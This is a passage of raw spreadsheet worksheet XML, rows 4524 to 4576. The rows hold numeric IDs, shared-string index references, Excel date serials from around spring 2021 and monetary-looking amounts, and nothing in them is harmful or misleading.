      </c>
      <c r="E4524">
        <v>26</v>
      </c>
      <c r="F4524" t="s">
        <v>12841</v>
      </c>
      <c r="G4524" s="1">
        <v>44322</v>
      </c>
      <c r="H4524">
        <v>81810</v>
      </c>
      <c r="J4524" t="s">
        <v>13692</v>
      </c>
    </row>
    <row r="4525" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4525">
        <v>25134</v>
      </c>
      <c r="B4525">
        <v>529</v>
      </c>
      <c r="C4525" t="s">
        <v>2389</v>
      </c>
      <c r="D4525" t="s">
        <v>13691</v>
      </c>
      <c r="E4525">
        <v>26</v>
      </c>
      <c r="F4525" t="s">
        <v>2236</v>
      </c>
      <c r="G4525" s="1">
        <v>44322</v>
      </c>
      <c r="H4525">
        <v>240856</v>
      </c>
      <c r="J4525" t="s">
        <v>13693</v>
      </c>
    </row>
    <row r="4526" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4526">
        <v>25135</v>
      </c>
      <c r="B4526">
        <v>529</v>
      </c>
      <c r="C4526" t="s">
        <v>2389</v>
      </c>
      <c r="D4526" t="s">
        <v>13691</v>
      </c>
      <c r="E4526">
        <v>26</v>
      </c>
      <c r="F4526" t="s">
        <v>4686</v>
      </c>
      <c r="G4526" s="1">
        <v>44322</v>
      </c>
      <c r="H4526">
        <v>10250</v>
      </c>
      <c r="J4526" t="s">
        <v>13694</v>
      </c>
    </row>
    <row r="4527" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4527">
        <v>25136</v>
      </c>
      <c r="B4527">
        <v>529</v>
      </c>
      <c r="C4527" t="s">
        <v>2389</v>
      </c>
      <c r="D4527" t="s">
        <v>13691</v>
      </c>
      <c r="E4527">
        <v>26</v>
      </c>
      <c r="F4527" t="s">
        <v>13695</v>
      </c>
      <c r="G4527" s="1">
        <v>44322</v>
      </c>
      <c r="H4527">
        <v>13934</v>
      </c>
      <c r="J4527" t="s">
        <v>13696</v>
      </c>
    </row>
    <row r="4528" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4528">
        <v>25137</v>
      </c>
      <c r="B4528">
        <v>529</v>
      </c>
      <c r="C4528" t="s">
        <v>2389</v>
      </c>
      <c r="D4528" t="s">
        <v>13691</v>
      </c>
      <c r="E4528">
        <v>26</v>
      </c>
      <c r="F4528" t="s">
        <v>13697</v>
      </c>
      <c r="G4528" s="1">
        <v>44322</v>
      </c>
      <c r="H4528">
        <v>0</v>
      </c>
      <c r="J4528" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4529" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4529">
        <v>25138</v>
      </c>
      <c r="B4529">
        <v>529</v>
      </c>
      <c r="C4529" t="s">
        <v>2389</v>
      </c>
      <c r="D4529" t="s">
        <v>13691</v>
      </c>
      <c r="E4529">
        <v>26</v>
      </c>
      <c r="F4529" t="s">
        <v>13698</v>
      </c>
      <c r="G4529" s="1">
        <v>44322</v>
      </c>
      <c r="H4529">
        <v>0</v>
      </c>
      <c r="J4529" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4530" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4530">
        <v>25139</v>
      </c>
      <c r="B4530">
        <v>529</v>
      </c>
      <c r="C4530" t="s">
        <v>2389</v>
      </c>
      <c r="D4530" t="s">
        <v>13691</v>
      </c>
      <c r="E4530">
        <v>26</v>
      </c>
      <c r="F4530" t="s">
        <v>13699</v>
      </c>
      <c r="G4530" s="1">
        <v>44322</v>
      </c>
      <c r="H4530">
        <v>0</v>
      </c>
      <c r="J4530" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4531" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4531">
        <v>25143</v>
      </c>
      <c r="B4531">
        <v>5543</v>
      </c>
      <c r="C4531" t="s">
        <v>2621</v>
      </c>
      <c r="D4531" t="s">
        <v>13700</v>
      </c>
      <c r="E4531">
        <v>12</v>
      </c>
      <c r="F4531" t="s">
        <v>13701</v>
      </c>
      <c r="G4531" s="1">
        <v>44337</v>
      </c>
      <c r="H4531">
        <v>300</v>
      </c>
      <c r="J4531" t="s">
        <v>13702</v>
      </c>
    </row>
    <row r="4532" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4532">
        <v>25144</v>
      </c>
      <c r="B4532">
        <v>5543</v>
      </c>
      <c r="C4532" t="s">
        <v>16556</v>
      </c>
      <c r="D4532" t="s">
        <v>16557</v>
      </c>
      <c r="E4532">
        <v>12</v>
      </c>
      <c r="F4532" t="s">
        <v>2236</v>
      </c>
      <c r="G4532" s="1">
        <v>44337</v>
      </c>
      <c r="H4532" s="4">
        <v>10000</v>
      </c>
      <c r="I4532" t="s">
        <v>9746</v>
      </c>
      <c r="J4532" t="s">
        <v>13703</v>
      </c>
    </row>
    <row r="4533" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4533">
        <v>25145</v>
      </c>
      <c r="B4533">
        <v>5543</v>
      </c>
      <c r="C4533" t="s">
        <v>2621</v>
      </c>
      <c r="D4533" t="s">
        <v>13700</v>
      </c>
      <c r="E4533">
        <v>12</v>
      </c>
      <c r="F4533" t="s">
        <v>4686</v>
      </c>
      <c r="G4533" s="1">
        <v>44337</v>
      </c>
      <c r="H4533">
        <v>500</v>
      </c>
      <c r="I4533" t="s">
        <v>9746</v>
      </c>
      <c r="J4533" t="s">
        <v>13704</v>
      </c>
    </row>
    <row r="4534" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4534">
        <v>25146</v>
      </c>
      <c r="B4534">
        <v>5543</v>
      </c>
      <c r="C4534" t="s">
        <v>2621</v>
      </c>
      <c r="D4534" t="s">
        <v>13700</v>
      </c>
      <c r="E4534">
        <v>12</v>
      </c>
      <c r="F4534" t="s">
        <v>13705</v>
      </c>
      <c r="G4534" s="1">
        <v>44337</v>
      </c>
      <c r="H4534">
        <v>1000</v>
      </c>
      <c r="I4534" t="s">
        <v>9746</v>
      </c>
      <c r="J4534" t="s">
        <v>13703</v>
      </c>
    </row>
    <row r="4535" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4535">
        <v>25147</v>
      </c>
      <c r="B4535">
        <v>5543</v>
      </c>
      <c r="C4535" t="s">
        <v>2621</v>
      </c>
      <c r="D4535" t="s">
        <v>13700</v>
      </c>
      <c r="E4535">
        <v>12</v>
      </c>
      <c r="F4535" t="s">
        <v>1746</v>
      </c>
      <c r="G4535" s="1">
        <v>44337</v>
      </c>
      <c r="H4535">
        <v>300</v>
      </c>
      <c r="I4535" t="s">
        <v>9746</v>
      </c>
      <c r="J4535" t="s">
        <v>13706</v>
      </c>
    </row>
    <row r="4536" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4536">
        <v>25149</v>
      </c>
      <c r="B4536">
        <v>1653</v>
      </c>
      <c r="C4536" t="s">
        <v>4534</v>
      </c>
      <c r="D4536" t="s">
        <v>13494</v>
      </c>
      <c r="E4536">
        <v>29</v>
      </c>
      <c r="F4536" t="s">
        <v>13707</v>
      </c>
      <c r="G4536" s="1">
        <v>44313</v>
      </c>
      <c r="H4536">
        <v>50</v>
      </c>
      <c r="I4536" t="s">
        <v>13708</v>
      </c>
      <c r="J4536" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4537" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4537">
        <v>25152</v>
      </c>
      <c r="B4537">
        <v>2624</v>
      </c>
      <c r="C4537" t="s">
        <v>6537</v>
      </c>
      <c r="D4537" t="s">
        <v>13709</v>
      </c>
      <c r="E4537">
        <v>16</v>
      </c>
      <c r="F4537" t="s">
        <v>10182</v>
      </c>
      <c r="G4537" s="1">
        <v>44358</v>
      </c>
      <c r="H4537">
        <v>3000</v>
      </c>
      <c r="I4537" t="s">
        <v>13710</v>
      </c>
    </row>
    <row r="4538" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4538">
        <v>25153</v>
      </c>
      <c r="B4538">
        <v>2624</v>
      </c>
      <c r="C4538" t="s">
        <v>6537</v>
      </c>
      <c r="D4538" t="s">
        <v>13709</v>
      </c>
      <c r="E4538">
        <v>16</v>
      </c>
      <c r="F4538" t="s">
        <v>10965</v>
      </c>
      <c r="G4538" s="1">
        <v>44358</v>
      </c>
      <c r="H4538">
        <v>3000</v>
      </c>
      <c r="I4538" t="s">
        <v>13711</v>
      </c>
    </row>
    <row r="4539" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4539">
        <v>25154</v>
      </c>
      <c r="B4539">
        <v>1858</v>
      </c>
      <c r="C4539" t="s">
        <v>5329</v>
      </c>
      <c r="D4539" t="s">
        <v>13712</v>
      </c>
      <c r="E4539">
        <v>29</v>
      </c>
      <c r="F4539" t="s">
        <v>1207</v>
      </c>
      <c r="G4539" s="1">
        <v>44350</v>
      </c>
      <c r="H4539">
        <v>120000</v>
      </c>
      <c r="J4539" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="4540" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4540">
        <v>25155</v>
      </c>
      <c r="B4540">
        <v>1858</v>
      </c>
      <c r="C4540" t="s">
        <v>5329</v>
      </c>
      <c r="D4540" t="s">
        <v>13712</v>
      </c>
      <c r="E4540">
        <v>29</v>
      </c>
      <c r="F4540" t="s">
        <v>1455</v>
      </c>
      <c r="G4540" s="1">
        <v>44350</v>
      </c>
      <c r="H4540">
        <v>120000</v>
      </c>
      <c r="J4540" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="4541" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4541">
        <v>25156</v>
      </c>
      <c r="B4541">
        <v>2577</v>
      </c>
      <c r="C4541" t="s">
        <v>5230</v>
      </c>
      <c r="D4541" t="s">
        <v>13486</v>
      </c>
      <c r="E4541">
        <v>12</v>
      </c>
      <c r="F4541" t="s">
        <v>7564</v>
      </c>
      <c r="G4541" s="1">
        <v>44307</v>
      </c>
      <c r="H4541">
        <v>15000</v>
      </c>
      <c r="I4541" t="s">
        <v>13713</v>
      </c>
      <c r="J4541" t="s">
        <v>13685</v>
      </c>
    </row>
    <row r="4542" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4542">
        <v>25157</v>
      </c>
      <c r="B4542">
        <v>1531</v>
      </c>
      <c r="C4542" t="s">
        <v>4619</v>
      </c>
      <c r="D4542" t="s">
        <v>13669</v>
      </c>
      <c r="E4542">
        <v>12</v>
      </c>
      <c r="F4542" t="s">
        <v>8913</v>
      </c>
      <c r="G4542" s="1">
        <v>44301</v>
      </c>
      <c r="H4542">
        <v>0</v>
      </c>
      <c r="I4542" t="s">
        <v>13714</v>
      </c>
    </row>
    <row r="4543" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4543">
        <v>25158</v>
      </c>
      <c r="B4543">
        <v>1667</v>
      </c>
      <c r="C4543" t="s">
        <v>4569</v>
      </c>
      <c r="D4543" t="s">
        <v>13715</v>
      </c>
      <c r="E4543">
        <v>16</v>
      </c>
      <c r="F4543" t="s">
        <v>1455</v>
      </c>
      <c r="G4543" s="1">
        <v>44375</v>
      </c>
      <c r="H4543">
        <v>16000000</v>
      </c>
      <c r="I4543" t="s">
        <v>10703</v>
      </c>
      <c r="J4543" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4544" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4544">
        <v>25160</v>
      </c>
      <c r="B4544">
        <v>5291</v>
      </c>
      <c r="C4544" t="s">
        <v>8450</v>
      </c>
      <c r="D4544" t="s">
        <v>13018</v>
      </c>
      <c r="E4544">
        <v>2</v>
      </c>
      <c r="F4544" t="s">
        <v>11988</v>
      </c>
      <c r="G4544" s="1">
        <v>44312</v>
      </c>
      <c r="H4544">
        <v>400000</v>
      </c>
      <c r="I4544" t="s">
        <v>13021</v>
      </c>
      <c r="J4544" t="s">
        <v>13716</v>
      </c>
    </row>
    <row r="4545" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4545">
        <v>25161</v>
      </c>
      <c r="B4545">
        <v>5291</v>
      </c>
      <c r="C4545" t="s">
        <v>8450</v>
      </c>
      <c r="D4545" t="s">
        <v>13018</v>
      </c>
      <c r="E4545">
        <v>2</v>
      </c>
      <c r="F4545" t="s">
        <v>1746</v>
      </c>
      <c r="G4545" s="1">
        <v>44312</v>
      </c>
      <c r="H4545">
        <v>400000</v>
      </c>
      <c r="I4545" t="s">
        <v>13021</v>
      </c>
      <c r="J4545" t="s">
        <v>13716</v>
      </c>
    </row>
    <row r="4546" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4546">
        <v>25162</v>
      </c>
      <c r="B4546">
        <v>204</v>
      </c>
      <c r="C4546" t="s">
        <v>2405</v>
      </c>
      <c r="D4546" t="s">
        <v>13717</v>
      </c>
      <c r="E4546">
        <v>14</v>
      </c>
      <c r="F4546" t="s">
        <v>2407</v>
      </c>
      <c r="G4546" s="1">
        <v>44357</v>
      </c>
      <c r="H4546">
        <v>400</v>
      </c>
      <c r="J4546" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4547" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4547">
        <v>25163</v>
      </c>
      <c r="B4547">
        <v>2009</v>
      </c>
      <c r="C4547" t="s">
        <v>6545</v>
      </c>
      <c r="D4547" t="s">
        <v>13718</v>
      </c>
      <c r="E4547">
        <v>26</v>
      </c>
      <c r="F4547" t="s">
        <v>2236</v>
      </c>
      <c r="G4547" s="1">
        <v>44315</v>
      </c>
      <c r="H4547">
        <v>801265</v>
      </c>
      <c r="J4547" t="s">
        <v>13719</v>
      </c>
    </row>
    <row r="4548" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4548">
        <v>25164</v>
      </c>
      <c r="B4548">
        <v>2009</v>
      </c>
      <c r="C4548" t="s">
        <v>6545</v>
      </c>
      <c r="D4548" t="s">
        <v>13718</v>
      </c>
      <c r="E4548">
        <v>26</v>
      </c>
      <c r="F4548" t="s">
        <v>4686</v>
      </c>
      <c r="G4548" s="1">
        <v>44315</v>
      </c>
      <c r="H4548">
        <v>0</v>
      </c>
    </row>
    <row r="4549" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4549">
        <v>25165</v>
      </c>
      <c r="B4549">
        <v>2009</v>
      </c>
      <c r="C4549" t="s">
        <v>6545</v>
      </c>
      <c r="D4549" t="s">
        <v>13718</v>
      </c>
      <c r="E4549">
        <v>26</v>
      </c>
      <c r="F4549" t="s">
        <v>9586</v>
      </c>
      <c r="G4549" s="1">
        <v>44315</v>
      </c>
      <c r="H4549">
        <v>0</v>
      </c>
    </row>
    <row r="4550" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4550">
        <v>25166</v>
      </c>
      <c r="B4550">
        <v>2009</v>
      </c>
      <c r="C4550" t="s">
        <v>6545</v>
      </c>
      <c r="D4550" t="s">
        <v>13718</v>
      </c>
      <c r="E4550">
        <v>26</v>
      </c>
      <c r="F4550" t="s">
        <v>9585</v>
      </c>
      <c r="G4550" s="1">
        <v>44315</v>
      </c>
      <c r="H4550">
        <v>0</v>
      </c>
    </row>
    <row r="4551" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4551">
        <v>25167</v>
      </c>
      <c r="B4551">
        <v>2009</v>
      </c>
      <c r="C4551" t="s">
        <v>6545</v>
      </c>
      <c r="D4551" t="s">
        <v>13718</v>
      </c>
      <c r="E4551">
        <v>26</v>
      </c>
      <c r="F4551" t="s">
        <v>9437</v>
      </c>
      <c r="G4551" s="1">
        <v>44315</v>
      </c>
      <c r="H4551">
        <v>52748</v>
      </c>
      <c r="J4551" t="s">
        <v>12904</v>
      </c>
    </row>
    <row r="4552" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4552">
        <v>25168</v>
      </c>
      <c r="B4552">
        <v>2009</v>
      </c>
      <c r="C4552" t="s">
        <v>6545</v>
      </c>
      <c r="D4552" t="s">
        <v>13718</v>
      </c>
      <c r="E4552">
        <v>26</v>
      </c>
      <c r="F4552" t="s">
        <v>13720</v>
      </c>
      <c r="G4552" s="1">
        <v>44315</v>
      </c>
      <c r="H4552">
        <v>0</v>
      </c>
    </row>
    <row r="4553" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4553">
        <v>25169</v>
      </c>
      <c r="B4553">
        <v>1568</v>
      </c>
      <c r="C4553" t="s">
        <v>2659</v>
      </c>
      <c r="D4553" t="s">
        <v>9569</v>
      </c>
      <c r="E4553">
        <v>26</v>
      </c>
      <c r="F4553" t="s">
        <v>13721</v>
      </c>
      <c r="G4553" s="1">
        <v>44334</v>
      </c>
      <c r="H4553">
        <v>5000</v>
      </c>
      <c r="I4553" t="s">
        <v>10334</v>
      </c>
      <c r="J4553" t="s">
        <v>13722</v>
      </c>
    </row>
    <row r="4554" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4554">
        <v>25170</v>
      </c>
      <c r="B4554">
        <v>1568</v>
      </c>
      <c r="C4554" t="s">
        <v>2659</v>
      </c>
      <c r="D4554" t="s">
        <v>9569</v>
      </c>
      <c r="E4554">
        <v>26</v>
      </c>
      <c r="F4554" t="s">
        <v>13723</v>
      </c>
      <c r="G4554" s="1">
        <v>44334</v>
      </c>
      <c r="H4554">
        <v>5000</v>
      </c>
      <c r="I4554" t="s">
        <v>10334</v>
      </c>
      <c r="J4554" t="s">
        <v>13722</v>
      </c>
    </row>
    <row r="4555" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4555">
        <v>25171</v>
      </c>
      <c r="B4555">
        <v>1568</v>
      </c>
      <c r="C4555" t="s">
        <v>2659</v>
      </c>
      <c r="D4555" t="s">
        <v>9569</v>
      </c>
      <c r="E4555">
        <v>26</v>
      </c>
      <c r="F4555" t="s">
        <v>4686</v>
      </c>
      <c r="G4555" s="1">
        <v>44334</v>
      </c>
      <c r="H4555">
        <v>3000</v>
      </c>
      <c r="I4555" t="s">
        <v>10334</v>
      </c>
      <c r="J4555" t="s">
        <v>13722</v>
      </c>
    </row>
    <row r="4556" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4556">
        <v>25172</v>
      </c>
      <c r="B4556">
        <v>1568</v>
      </c>
      <c r="C4556" t="s">
        <v>2659</v>
      </c>
      <c r="D4556" t="s">
        <v>9569</v>
      </c>
      <c r="E4556">
        <v>26</v>
      </c>
      <c r="F4556" t="s">
        <v>3814</v>
      </c>
      <c r="G4556" s="1">
        <v>44334</v>
      </c>
      <c r="H4556">
        <v>2500</v>
      </c>
      <c r="I4556" t="s">
        <v>10334</v>
      </c>
      <c r="J4556" t="s">
        <v>13722</v>
      </c>
    </row>
    <row r="4557" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4557">
        <v>25173</v>
      </c>
      <c r="B4557">
        <v>5290</v>
      </c>
      <c r="C4557" t="s">
        <v>16558</v>
      </c>
      <c r="D4557" t="s">
        <v>16559</v>
      </c>
      <c r="E4557">
        <v>12</v>
      </c>
      <c r="F4557" t="s">
        <v>9437</v>
      </c>
      <c r="G4557" s="1">
        <v>44299</v>
      </c>
      <c r="H4557" s="4">
        <v>3000000</v>
      </c>
      <c r="I4557" t="s">
        <v>13725</v>
      </c>
      <c r="J4557" t="s">
        <v>13726</v>
      </c>
    </row>
    <row r="4558" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4558">
        <v>25174</v>
      </c>
      <c r="B4558">
        <v>5290</v>
      </c>
      <c r="C4558" t="s">
        <v>16558</v>
      </c>
      <c r="D4558" t="s">
        <v>16559</v>
      </c>
      <c r="E4558">
        <v>12</v>
      </c>
      <c r="F4558" t="s">
        <v>13727</v>
      </c>
      <c r="G4558" s="1">
        <v>44299</v>
      </c>
      <c r="H4558" s="4">
        <v>200000</v>
      </c>
      <c r="I4558" t="s">
        <v>13728</v>
      </c>
      <c r="J4558" t="s">
        <v>13729</v>
      </c>
    </row>
    <row r="4559" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4559">
        <v>25175</v>
      </c>
      <c r="B4559">
        <v>5290</v>
      </c>
      <c r="C4559" t="s">
        <v>16558</v>
      </c>
      <c r="D4559" t="s">
        <v>16559</v>
      </c>
      <c r="E4559">
        <v>12</v>
      </c>
      <c r="F4559" t="s">
        <v>13730</v>
      </c>
      <c r="G4559" s="1">
        <v>44299</v>
      </c>
      <c r="H4559" s="4">
        <v>200000</v>
      </c>
      <c r="I4559" t="s">
        <v>13725</v>
      </c>
      <c r="J4559" t="s">
        <v>13729</v>
      </c>
    </row>
    <row r="4560" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4560">
        <v>25176</v>
      </c>
      <c r="B4560">
        <v>5290</v>
      </c>
      <c r="C4560" t="s">
        <v>8862</v>
      </c>
      <c r="D4560" t="s">
        <v>13724</v>
      </c>
      <c r="E4560">
        <v>12</v>
      </c>
      <c r="F4560" t="s">
        <v>2236</v>
      </c>
      <c r="G4560" s="1">
        <v>44299</v>
      </c>
      <c r="H4560">
        <v>50000</v>
      </c>
      <c r="I4560" t="s">
        <v>13725</v>
      </c>
      <c r="J4560" t="s">
        <v>13729</v>
      </c>
    </row>
    <row r="4561" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4561">
        <v>25177</v>
      </c>
      <c r="B4561">
        <v>2558</v>
      </c>
      <c r="C4561" t="s">
        <v>4971</v>
      </c>
      <c r="D4561" t="s">
        <v>10001</v>
      </c>
      <c r="E4561">
        <v>12</v>
      </c>
      <c r="F4561" t="s">
        <v>9523</v>
      </c>
      <c r="G4561" s="1">
        <v>44302</v>
      </c>
      <c r="H4561">
        <v>15000</v>
      </c>
      <c r="J4561" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4562" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4562">
        <v>25178</v>
      </c>
      <c r="B4562">
        <v>133</v>
      </c>
      <c r="C4562" t="s">
        <v>264</v>
      </c>
      <c r="D4562" t="s">
        <v>9680</v>
      </c>
      <c r="E4562">
        <v>12</v>
      </c>
      <c r="F4562" t="s">
        <v>9523</v>
      </c>
      <c r="G4562" s="1">
        <v>44305</v>
      </c>
      <c r="H4562">
        <v>7500</v>
      </c>
      <c r="J4562" t="s">
        <v>13731</v>
      </c>
    </row>
    <row r="4563" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4563">
        <v>25181</v>
      </c>
      <c r="B4563">
        <v>374</v>
      </c>
      <c r="C4563" t="s">
        <v>1035</v>
      </c>
      <c r="D4563" t="s">
        <v>10908</v>
      </c>
      <c r="E4563">
        <v>16</v>
      </c>
      <c r="F4563" t="s">
        <v>13732</v>
      </c>
      <c r="G4563" s="1">
        <v>44319</v>
      </c>
      <c r="H4563">
        <v>8250</v>
      </c>
      <c r="I4563" t="s">
        <v>9550</v>
      </c>
      <c r="J4563" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="4564" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4564">
        <v>25183</v>
      </c>
      <c r="B4564">
        <v>5469</v>
      </c>
      <c r="C4564" t="s">
        <v>8706</v>
      </c>
      <c r="D4564" t="s">
        <v>13356</v>
      </c>
      <c r="E4564">
        <v>16</v>
      </c>
      <c r="F4564" t="s">
        <v>13559</v>
      </c>
      <c r="G4564" s="1">
        <v>44306</v>
      </c>
      <c r="H4564">
        <v>3000</v>
      </c>
      <c r="I4564" t="s">
        <v>13710</v>
      </c>
    </row>
    <row r="4565" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4565">
        <v>25184</v>
      </c>
      <c r="B4565">
        <v>5469</v>
      </c>
      <c r="C4565" t="s">
        <v>8706</v>
      </c>
      <c r="D4565" t="s">
        <v>13356</v>
      </c>
      <c r="E4565">
        <v>16</v>
      </c>
      <c r="F4565" t="s">
        <v>13733</v>
      </c>
      <c r="G4565" s="1">
        <v>44306</v>
      </c>
      <c r="H4565">
        <v>2500</v>
      </c>
      <c r="I4565" t="s">
        <v>13734</v>
      </c>
    </row>
    <row r="4566" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4566">
        <v>25185</v>
      </c>
      <c r="B4566">
        <v>1667</v>
      </c>
      <c r="C4566" t="s">
        <v>4569</v>
      </c>
      <c r="D4566" t="s">
        <v>13715</v>
      </c>
      <c r="E4566">
        <v>16</v>
      </c>
      <c r="F4566" t="s">
        <v>1651</v>
      </c>
      <c r="G4566" s="1">
        <v>44375</v>
      </c>
      <c r="H4566">
        <v>9000000</v>
      </c>
      <c r="I4566" t="s">
        <v>13735</v>
      </c>
      <c r="J4566" t="s">
        <v>13736</v>
      </c>
    </row>
    <row r="4567" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4567">
        <v>25186</v>
      </c>
      <c r="B4567">
        <v>5582</v>
      </c>
      <c r="C4567" t="s">
        <v>9010</v>
      </c>
      <c r="D4567" t="s">
        <v>13737</v>
      </c>
      <c r="E4567">
        <v>11</v>
      </c>
      <c r="F4567" t="s">
        <v>13738</v>
      </c>
      <c r="G4567" s="1">
        <v>44327</v>
      </c>
      <c r="H4567">
        <v>50000</v>
      </c>
      <c r="I4567" t="s">
        <v>13739</v>
      </c>
    </row>
    <row r="4568" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4568">
        <v>25187</v>
      </c>
      <c r="B4568">
        <v>5582</v>
      </c>
      <c r="C4568" t="s">
        <v>9010</v>
      </c>
      <c r="D4568" t="s">
        <v>13737</v>
      </c>
      <c r="E4568">
        <v>11</v>
      </c>
      <c r="F4568" t="s">
        <v>9577</v>
      </c>
      <c r="G4568" s="1">
        <v>44327</v>
      </c>
      <c r="H4568">
        <v>45000</v>
      </c>
      <c r="I4568" t="s">
        <v>13740</v>
      </c>
    </row>
    <row r="4569" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4569">
        <v>25188</v>
      </c>
      <c r="B4569">
        <v>5582</v>
      </c>
      <c r="C4569" t="s">
        <v>9010</v>
      </c>
      <c r="D4569" t="s">
        <v>13737</v>
      </c>
      <c r="E4569">
        <v>11</v>
      </c>
      <c r="F4569" t="s">
        <v>13741</v>
      </c>
      <c r="G4569" s="1">
        <v>44327</v>
      </c>
      <c r="H4569">
        <v>55000</v>
      </c>
      <c r="I4569" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4570" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4570">
        <v>25189</v>
      </c>
      <c r="B4570">
        <v>5582</v>
      </c>
      <c r="C4570" t="s">
        <v>9010</v>
      </c>
      <c r="D4570" t="s">
        <v>13737</v>
      </c>
      <c r="E4570">
        <v>11</v>
      </c>
      <c r="F4570" t="s">
        <v>2924</v>
      </c>
      <c r="G4570" s="1">
        <v>44327</v>
      </c>
      <c r="H4570">
        <v>40000</v>
      </c>
      <c r="I4570" t="s">
        <v>13743</v>
      </c>
    </row>
    <row r="4571" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4571">
        <v>25190</v>
      </c>
      <c r="B4571">
        <v>5582</v>
      </c>
      <c r="C4571" t="s">
        <v>9010</v>
      </c>
      <c r="D4571" t="s">
        <v>13737</v>
      </c>
      <c r="E4571">
        <v>11</v>
      </c>
      <c r="F4571" t="s">
        <v>9435</v>
      </c>
      <c r="G4571" s="1">
        <v>44327</v>
      </c>
      <c r="H4571">
        <v>52000</v>
      </c>
      <c r="I4571" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4572" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4572">
        <v>25191</v>
      </c>
      <c r="B4572">
        <v>5582</v>
      </c>
      <c r="C4572" t="s">
        <v>9010</v>
      </c>
      <c r="D4572" t="s">
        <v>13737</v>
      </c>
      <c r="E4572">
        <v>11</v>
      </c>
      <c r="F4572" t="s">
        <v>13744</v>
      </c>
      <c r="G4572" s="1">
        <v>44327</v>
      </c>
      <c r="H4572">
        <v>60000</v>
      </c>
      <c r="I4572" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4573" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4573">
        <v>25192</v>
      </c>
      <c r="B4573">
        <v>5582</v>
      </c>
      <c r="C4573" t="s">
        <v>9010</v>
      </c>
      <c r="D4573" t="s">
        <v>13737</v>
      </c>
      <c r="E4573">
        <v>11</v>
      </c>
      <c r="F4573" t="s">
        <v>10062</v>
      </c>
      <c r="G4573" s="1">
        <v>44327</v>
      </c>
      <c r="H4573">
        <v>50</v>
      </c>
      <c r="I4573" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4574" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4574">
        <v>25193</v>
      </c>
      <c r="B4574">
        <v>5582</v>
      </c>
      <c r="C4574" t="s">
        <v>9010</v>
      </c>
      <c r="D4574" t="s">
        <v>13737</v>
      </c>
      <c r="E4574">
        <v>11</v>
      </c>
      <c r="F4574" t="s">
        <v>9438</v>
      </c>
      <c r="G4574" s="1">
        <v>44327</v>
      </c>
      <c r="H4574">
        <v>53000</v>
      </c>
      <c r="I4574" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4575" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4575">
        <v>25194</v>
      </c>
      <c r="B4575">
        <v>5582</v>
      </c>
      <c r="C4575" t="s">
        <v>9010</v>
      </c>
      <c r="D4575" t="s">
        <v>13737</v>
      </c>
      <c r="E4575">
        <v>11</v>
      </c>
      <c r="F4575" t="s">
        <v>9437</v>
      </c>
      <c r="G4575" s="1">
        <v>44327</v>
      </c>
      <c r="H4575">
        <v>60000</v>
      </c>
      <c r="I4575" t="s">
        <v>13742</v>
      </c>
    </row>
    <row r="4576" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4576">
        <v>25195</v>
      </c>
      <c r="B4576">
        <v>5582</v>
      </c>
      <c r="C4576" t="s">
        <v>9010</v>
      </c>
      <c r="D4576" t="s">
        <v>13737</v>
      </c>
